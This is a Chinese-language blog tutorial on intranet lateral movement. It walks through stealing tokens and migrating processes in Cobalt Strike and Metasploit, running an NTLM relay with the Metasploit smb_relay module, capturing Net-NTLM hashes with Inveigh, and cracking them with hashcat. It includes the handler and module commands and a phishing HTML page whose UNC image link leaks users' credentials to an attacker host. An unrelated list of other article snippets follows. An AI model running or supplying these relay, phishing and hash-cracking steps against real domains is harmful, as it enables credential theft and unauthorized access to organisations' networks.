内网横向移动—NTLM-Relay重放Responder中继攻击LdapEws

内网横向移动—NTLM-Relay重放&Responder中继攻击&Ldap&Ews

  • 1. 前置了解
    • 1.1. MSF与CS切换权限
      • 1.1.1. CS会话中切换权限
        • 1.1.1.1. 查看进程
        • 1.1.1.2. 权限权限
      • 1.1.2. MSF会话中切换权限
  • 2. NTLM中继攻击—Relay重放—SMB上线
    • 2.1. 案例测试
      • 2.1.1. 同账户密码测试
      • 2.1.2. 不同账户同密码测试
    • 2.2. CS联动MSF测试
      • 2.2.1. CS转发MSF上线
        • 2.2.1.1. 案例操作
        • 2.2.1.2. 添加路由
      • 2.2.2. 重放模块攻击
        • 2.2.2.1. 模块设置
        • 2.2.2.2. 访问设置
  • 3. NTLM中继攻击-Inveigh嗅探-Hash破解
    • 3.1. 开启监听
    • 3.2. 开始拦截
    • 3.3. 钓鱼页面
    • 3.4. 破解密文

1. 前置了解

  与NLTM认证相关的安全问题主要有Pass The Hash、利用NTLM进行信息收集、Net-NTLM Hash破解、NTLM Relay几种。PTH前往期文章复现,运用mimikatz、impacket工具包的一些脚本、CS等等都可以利用,NTLM Relay又包括(relay to smb,ldap,ews)
  可以应用在获取不到明文或HASH时采用的手法,但也要注意手法的必备条件。

1.1. MSF与CS切换权限

  在正常CS或者MSF上线的时候,我们的目标通常是普通用户上线,如何提权到system权限,但是有时候需要使用到administrator,就会导致我们没有会话去连接,那么这里就是介绍一下,如何切换会话中的权限,同时要注意的是,低权限会话是无法切换至高权限的,但是高权限能够切换至低权限,相当于system权限能够切换到administrator,但是webadmin权限是无法切换至administrator权限的,这个是需要注意的。

  简单来说,我们需要获取到最高权限才能降权限。

1.1.1. CS会话中切换权限

  首先利用CS会话中高权限去查看进程,观察进程中有哪些是administrator权限再运行的,然后记录这个进程的PID值,其次切换PID值即可。

1.1.1.1. 查看进程

  这里我先提前给各位看了一下,我的现在的权限是system权限,然后使用ps查看了一下哪些是administrator权限再运行的,这里我看到一个PID号位2336的。

ps  ##查看运行进程

在这里插入图片描述

1.1.1.2. 权限权限

  这里可以看到我成功切换了权限。

steal_token 2336   ##切换权限  2336 是PID进程号

在这里插入图片描述

1.1.2. MSF会话中切换权限

  这里我就不说进程了,是一样的操作,都是查进程记PID,然后切换,只是切换命令有点不同。

migrate 1992   #1992是PID号

在这里插入图片描述

2. NTLM中继攻击—Relay重放—SMB上线

  在使用Relay重放的时候需要有一个前置条件,这个条件就是需要通讯的双方账户与密码是一致的,例如:Windows server 2012 DC中有administrator/admin@123,同时Windows server 2008 域内主机虽然登陆的是0day/webadmin,但是还是如果其中的administrator账户的与密码和DC是一样的,那么就可以进行访问,因为访问的时候默认是使用当前的账户密码去与对方的账户密码进行校验。

2.1. 案例测试

  这里我们对DC进行测试一下,案例配置如下:

域控DC:192.168.3.142  administrator/admin@123
域内主机:192.168.3.10  administrator/admin@123webadmin/admin@123

  从上述也能够看出,密码都是一样的,只有账户存在不同,下面就来进行测试,看看是否验证了之前的说法。

2.1.1. 同账户密码测试

  我将域内主机也切换到administrator,来进行测试,按照这个条件,那么此时的域控DC与域内主机是相同账户密码,可以看到直接就能够访问,并未出现什么报错。

在这里插入图片描述

2.1.2. 不同账户同密码测试

  我将域内主机切换到webadmin,来进行测试,按照条件,目前是不同的账户,但是密码是相同的,可以看到这里直接就是拒绝访问,当然这里应该是账户密码错误的,这里拒绝访问应该是域控设置权限的问题。

在这里插入图片描述

2.2. CS联动MSF测试

  先让域内主机上线CS,由于CS中没有相应的功能,需要使用联动MSF进行测试,同时这里要把传输过来的会话提权到systeam进行执行。

  至于CS的上线操作这里就不多说了。

2.2.1. CS转发MSF上线

  在上篇文章中已经介绍CS转发MSF上线了,这里就不提了,直接看操作,也不介绍了。

2.2.1.1. 案例操作

  注意这里一定要先run,然后CS再进行操作,不然容易监听不起来。

CS:新建会话,会话选择监听的那个MSF,也可以使用命令:spawn msf
MSF:设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 3010
run

在这里插入图片描述

2.2.1.2. 添加路由

  由于域控是在内网中,所以需要给会话添加一个相应的路由,这样MSF就能够连接域内主机。

run autoroute -p ##查看当前路由表
run post/multi/manage/autoroute ##添加当前路由表
backgroup ##返回

在这里插入图片描述

2.2.2. 重放模块攻击

  这里就需要使用到SMB重放模块进行攻击,这里看完下面的操作,再看图就能看懂了,同样前提条件就是账号密码相同,才能利用成功,如果不同就无法利用。

在这里插入图片描述

2.2.2.1. 模块设置

  这里我就直接说了并未成功,只返回了hash值,但是会话并未建立起来,我查询了一下,确实网上很多文章都未成功,不过也有说64位系统未成功,但是32位系统成功了,这…所以我也不想切换32位系统进行测试了,如果只有32位系统能够成功,那真的就太鸡肋了,同时还有一种情况,目前更新的msf都是新的,会不会是msf模块中的一个小bug问题,所导致的。

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.142   #攻击目标
set lhost 192.168.10.20   #设置本地 IP
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp  ##设置正向连接
set rhost 192.168.3.142 #设置连接目标
run

在这里插入图片描述

2.2.2.2. 访问设置

  这里需要在被控主机上访问攻击主机地址,简单来说,就是被控主机去访问攻击机,将自生的账户密码相当于发送给攻击机,让攻击机获取到账号密码再去访问域控,实现攻击机中继拦截上线。

  同时需要注意要使用administrator权限去操作。

dir \\192.168.10.20\c$

在这里插入图片描述

3. NTLM中继攻击-Inveigh嗅探-Hash破解

  这个攻击手段就是攻击者在被控主机上伪造一个SMB服务器,当内网中有机器对被控主机进行SMB访问的时候,内网中的主机先访问攻击者伪造的SMB服务器,然后伪造的SMB服务器再将访问流量重放给被控主机,在这个过程中,内网主机是毫无感觉的,但是内网主机访问的用户的账号与密码的hash值均被伪造的SMB服务器获取。

  Inveigh嗅探

  hash破解

  这里由于我的虚拟机中都不止.net3.5,而且不知道为什么无法安装,也挺麻烦的,所以直接借鉴别人的加口述的,主要是操作很简单,不复杂,所以就懒得弄了。

3.1. 开启监听

  这里不建议将这个监听,放在本地去监听,容易出现问题,由于工具并不是很大,可以将工具上传至被控服务器上,实际情况中如果被杀,那么就只能本地监听了。

  这里还需要注意的是开启监听,一定要是内网主机都会访问这个主机,例如:开启监控的主机是域控,那你域内主机不访问域控的SMB那么就监听不到。

Inveigh.exe

在这里插入图片描述

3.2. 开始拦截

  这里也是,你访问的一定要是那个被监听的域内主机,不然无法获取到。

dir \\192.168.3.x\c$

在这里插入图片描述

3.3. 钓鱼页面

  这里可能会存在一个问题就是,我平时就不访问域控主机,而且谁闲着没事,使用dir去访问啊,而且域内使用者,都是办公人员,也不会这些操作,所以就需要设置一个钓鱼页面,挂载在内部的web解密中,或者你主动发送给域内主机。

<!DOCTYPE html>
<html>
<head><title></title>
</head>
<body><img src="file:///\\192.168.3.32\2">
</body>
</html>

3.4. 破解密文

  但是这里有问题哦,如果虚拟机配置不够是会出现报错的,这个破解可能是需要进行加密计算的,然后比对,所以配置低,可能无法运行那么打的并发吧。看配置是需要4h4g…

hashcat -m 5600 hash1 pass2.txt  --show

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/74552.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

GC 深入(小白,对gc有一个进一步的了解)

垃圾回收器的搭配 一般固定 一般这年轻代垃圾回收器&#xff0c;老年代垃圾回收器&#xff0c;如上图搭配着使用 1.8呢默认就是最后边那哥俩 jvm调优 一个就是增加吞吐量 一个就是减少STW的时间。 三色标记算法&#xff08;理解根可达算法&#xff09; 并发的可达性分析 有…

k8s集群部署nacos,采用的是 emptyDir 临时目录挂载

官方参考地址&#xff1a;https://nacos.io/zh-cn/docs/use-nacos-with-kubernetes.html 说明&#xff1a; 1、官网采用的nfs持久化部署 我将nacos持久化改成 emptyDir 临时目录挂载&#xff0c;同时又能满足自行调节nacos集群实例数。 2. emptyDir 临时目录挂载的nacos.ya…

【前端知识】React 基础巩固(四十三)——Effect Hook

React 基础巩固(四十三)——Effect Hook 一、Effect Hook的基本使用 Effect Hook 用来完成一些类似class中生命周期的功能。 在使用类组件时&#xff0c;不管是渲染、网路请求还是操作DOM&#xff0c;其逻辑和代码是杂糅在一起的。例如我们希望把计数器结果显示在标签上&…

【计算机视觉|人脸建模】3D人脸重建基础知识(入门)

本系列博文为深度学习/计算机视觉论文笔记&#xff0c;转载请注明出处 一、三维重建基础 三维重建&#xff08;3D Reconstruction&#xff09;是指根据单视图或者多视图的图像重建三维信息的过程。 1. 常见三维重建技术 人工几何模型仪器采集基于图像的建模描述基于几何建模…

opencv37-形态学操作-开运算(先腐蚀后膨胀)cv2.morphologyEx()-参数 op 设置为“cv2.MORPH_OPEN”

腐蚀操作和膨胀操作是形态学运算的基础&#xff0c;将腐蚀和膨胀操作进行组合&#xff0c;就可以实现开运算、闭运算&#xff08;关运算&#xff09;、形态学梯度&#xff08;MorphologicalGradient&#xff09;运算、礼帽运算&#xff08;顶帽运算&#xff09;、黑帽运算、击中…

使用AIGC工具提升安全工作效率

新钛云服已累计为您分享760篇技术干货 在日常工作中&#xff0c;安全人员可能会涉及各种各样的安全任务&#xff0c;包括但不限于&#xff1a; 开发某些安全工具的插件&#xff0c;满足自己特定的安全需求&#xff1b;自定义github搜索工具&#xff0c;快速查找所需的安全资料、…

杂谈项——关于我在bw上的见闻,以及个人对二次元游戏行业方面的前瞻

君兮_的个人主页 勤时当勉励 岁月不待人 C/C 游戏开发 Hello,米娜桑们&#xff0c;这里是君兮_&#xff0c;今天为大家带来一点不一样的&#xff0c;首先先光速叠一下甲&#xff1a; 在此说明博主并不是一个什么都知道的大佬&#xff0c;只是一个普通的老二次元以及期望以后能…

docker数据持久化

在Docker中若要想实现容器数据的持久化&#xff08;所谓的数据持久化即数据不随着Container的结束而销毁&#xff09;&#xff0c;需要将数据从宿主机挂载到容器中。目前Docker提供了三种不同的方式将数据从宿主机挂载到容器中。 &#xff08;1&#xff09;Volumes&#xff1a;…

力扣 C++|一题多解之动态规划专题(1)

动态规划 Dynamic Programming 简写为 DP&#xff0c;是运筹学的一个分支&#xff0c;是求解决策过程最优化的过程。20世纪50年代初&#xff0c;美国数学家贝尔曼&#xff08;R.Bellman&#xff09;等人在研究多阶段决策过程的优化问题时&#xff0c;提出了著名的最优化原理&…

JavaScript原生将图片转成base64

1.写个html文件 <!-- 产品照片 --> <div class"mb-3"> <label for"cover" class"form-label">产品图片</label><inputtype"file"class"form-control"id"coverfile"/> </div>…

深度学习——LSTM解决分类问题

RNN基本介绍 概述 循环神经网络&#xff08;Recurrent Neural Network&#xff0c;RNN&#xff09;是一种深度学习模型&#xff0c;主要用于处理序列数据&#xff0c;如文本、语音、时间序列等具有时序关系的数据。 核心思想 RNN的关键思想是引入了循环结构&#xff0c;允许…

在线五子棋对战

目录 数据管理模块&#xff08;数据库设计&#xff09; 前端界面模块 业务处理模块 会话管理模块网络通信模块(session,cookie) 在线管理模块 房间管理模块 用户匹配模块 项目扩展 数据管理模块&#xff08;数据库设计&#xff09; 数据库中有可能存在很多张表&#xf…

Vue3文本省略(Ellipsis)

APIs 参数说明类型默认值必传maxWidth文本最大宽度number | string‘100%’falseline最大行数numberundefinedfalsetrigger展开的触发方式‘click’undefinedfalsetooltip是否启用文本提示框booleantruefalsetooltipMaxWidth提示框内容最大宽度&#xff0c;单位px&#xff0c;…

七大经典比较排序算法

1. 插入排序 (⭐️⭐️) &#x1f31f; 思想&#xff1a; 直接插入排序是一种简单的插入排序法&#xff0c;思想是是把待排序的数据按照下标从小到大&#xff0c;依次插入到一个已经排好的序列中&#xff0c;直至全部插入&#xff0c;得到一个新的有序序列。例如&#xff1a;…

计算机视觉与图形学-神经渲染专题-第一个基于NeRF的自动驾驶仿真平台

如今&#xff0c;自动驾驶汽车可以在普通情况下平稳行驶&#xff0c;人们普遍认识到&#xff0c;真实的传感器模拟将在通过模拟解决剩余的极端情况方面发挥关键作用。为此&#xff0c;我们提出了一种基于神经辐射场&#xff08;NeRF&#xff09;的自动驾驶模拟器。与现有作品相…

Python爬虫—破解JS加密的Cookie

前言 在进行网站数据爬取时&#xff0c;很多网站会使用JS加密来保护Cookie的安全性&#xff0c;而为了防止被网站反爬虫机制识别出来&#xff0c;我们通常需要使用代理IP来隐藏我们的真实IP地址。 本篇文章将介绍如何结合代理IP破解JS加密的Cookie&#xff0c;主要包括以下几个…

DDS中间件设计

OpenDDS、FastDDS数据分发服务中间件设计 软件架构 应用层DDS层RTPS层传输层 软件层次 FastDDS整体架构如下&#xff0c;这里可以看到DDS和RTPS的关系。另外缺少一部分IDL&#xff08;统一描述语言&#xff09;&#xff0c;其应该是Pub、Sub的反序列化、序列化工具。 在RT…

RabbitMQ 备份交换机和死信交换机

为处理生产者生产者将消息推送到交换机中&#xff0c;交换机按照消息中的路由键即自身策略无法将消息投递到指定队列中造成消息丢失的问题&#xff0c;可以使用备份交换机。 为处理在消息队列中到达TTL的过期消息&#xff0c;可采用死信交换机进行消息转存。 通过上述描述可知&…

vue 图片回显标签

第一种 <el-form-item label"打款银行回单"><image-preview :src"form.bankreceiptUrl" :width"120" :height"120"/></el-form-item>// 值为 https://t11.baidu.com/it/app106&fJPEG&fm30&fmtauto&…